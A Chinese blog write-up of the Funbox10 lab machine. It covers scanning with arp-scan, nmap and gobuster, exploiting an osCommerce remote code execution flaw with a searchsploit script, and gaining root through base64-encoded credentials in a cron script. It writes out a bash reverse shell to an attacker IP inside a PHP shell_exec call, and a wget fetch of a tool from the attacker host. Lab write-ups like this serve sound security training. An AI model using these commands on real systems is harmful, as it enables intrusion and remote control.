funbox10靶机(命令执行漏洞)

环境准备

靶机链接:百度网盘 请输入提取码

提取码:v4in

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机 arp-scan -l

2.探测目标靶机开放端口和服务情况

nmap -p- -A -T4 192.168.1.100

3.用gobuster对80端口进行目录探测

gobuster dir -u http://192.168.1.100 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.查看页面

 

2.对扫出的catalog目录进行访问,并且发现其版本号

3.用kali自动工具进行漏洞探测 searchsploit oscommerce

4.我们用远程代码执行漏洞的44374.py ,并且查看内容

5.把base_url改为靶机地址,进行访问,网页给出的是一个ls 命令的结果(29行)

6.这次我们把29行改为 ls -l /bin ,再次访问

7.这次把命令换为一个可以反弹shell的命令,观察这是php网页,所以执行命令也是用php支持执行的(谷歌php执行命令函数),我们用shell-exec , bash -c 是执行的意思

"shell-exec('bash -c \"bash -i >& /dev/tcp/192.168.1.106/4444 0>&1\"');"

8.访问页面,shell回弹成功

权限提升

1.没有可利用的信息和文件,我选择上传本地脚本进行探测(github里有pspy64)

wget http://192.168.1.106:8000/pspy64

2.检测出一个自动任务的脚本(大概5.6分钟才能看到)

3.查看下内容发现有一段base64加密的信息

4.经过解密后 ,发现密码 //-d参数是解密

echo 'LXUgcm9vdCAtcCByZnZiZ3QhIQ==' | base64 -d

-u root -p rfvbgt!!

5.尝试登录root用户,成功登录,顺利拿下!!!

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值